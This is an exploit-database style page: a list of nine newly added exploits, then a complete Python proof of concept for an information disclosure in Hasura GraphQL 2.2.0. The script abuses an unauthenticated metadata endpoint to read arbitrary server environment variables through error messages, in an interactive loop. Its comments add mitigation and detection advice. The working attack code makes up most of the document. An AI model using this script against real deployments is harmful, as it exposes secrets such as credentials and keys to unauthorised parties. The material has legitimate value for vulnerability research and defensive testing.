
9 changes to exploits/shellcodes Private Internet Access 3.3 - 'pia-service' Unquoted Service Path Cloudflare WARP 1.4 - Unquoted Service Path Malwarebytes 4.5 - Unquoted Service Path Foxit PDF Reader 11.0 - Unquoted Service Path Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE) part-db 0.5.11 - Remote Code Execution (RCE) Attendance and Payroll System v1.0 - Remote Code Execution (RCE) Attendance and Payroll System v1.0 - SQLi Authentication Bypass Hasura GraphQL 2.2.0 - Information Disclosure
# Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure
# Software: Hasura GraphQL Community
# Software Link: https://github.com/hasura/graphql-engine
# Version: 2.2.0
# Exploit Author: Dolev Farhi
# Date: 5/05/2022
# Tested on: Ubuntu
import requests
# Proof of concept for the information disclosure named in the header.
#
# What it demonstrates: the metadata API is asked to register a remote schema
# whose URL is taken from an environment variable (`url_from_env`). Judging by
# the parsing below, the server's error text contains the variable's value
# after the marker 'not a valid URI:', so any variable of the server process
# that is not a well-formed URI can be read back by whoever may call the API.
#
# Precondition visible here: the POST carries no credential header at all, so
# it only works where /v1/metadata answers unauthenticated callers
# (presumably an instance running without an admin secret - confirm against
# the deployment).
#
# Defensive notes:
#   * Mitigation: configure HASURA_GRAPHQL_ADMIN_SECRET so metadata calls need
#     a credential, and keep /v1/metadata unreachable from untrusted networks.
#   * Detection: look for POSTs to /v1/metadata containing `add_remote_schema`
#     with `url_from_env` set to names that are not URL settings, especially
#     repeated failing calls that reuse the schema name "ttt".
#   * Secrets held in the server's environment should be treated as exposed
#     and rotated if such requests show up in the logs.

# Placeholder address left by the author; the endpoint is reached over plain
# HTTP.
SERVER_ADDR = 'x.x.x.x'
url = f'http://{SERVER_ADDR}/v1/metadata'


def _remote_schema_request(env_key):
    """Build the bulk metadata call that names *env_key* as the schema URL source.

    The key order matches the author's literal, so the serialized JSON body
    is the same as in the original listing.
    """
    schema_definition = {
        "timeout_seconds": 60,
        "forward_client_headers": False,
        "headers": [],
        # The only caller-controlled field: the name of the environment
        # variable the server is told to read the URL from.
        "url_from_env": env_key,
    }
    add_schema_call = {
        "type": "add_remote_schema",
        "args": {
            "name": "ttt",
            "definition": schema_definition,
            "comment": "",
        },
    }
    return {
        "type": "bulk",
        "source": "",
        "args": [add_schema_call],
        "resource_version": 2,
    }


print('Hasura GraphQL Community 2.2.0 - Arbitrary Root Environment Variables Read')

# Interactive loop: one metadata request per non-empty variable name typed.
while True:
    requested_key = input('Type environment variable key to leak.\n> ')
    if requested_key:
        response = requests.post(url, json=_remote_schema_request(requested_key))
        try:
            # Everything after the marker is taken as the variable's value.
            print(response.json()['error'].split('not a valid URI:')[1])
        except IndexError:
            # Marker absent: the error says something else (for example the
            # variable is unset or already holds a valid URI - not
            # distinguishable from here), so the raw error text is shown.
            # NOTE(review): only IndexError is handled; a response without an
            # 'error' key raises KeyError above, and requests.post has no
            # timeout. If the call is accepted, a remote schema named "ttt"
            # may be left behind in the metadata - verify on the server.
            print('Could not parse out VAR, dumping error as is')
            print(response.json().get('error', 'N/A'))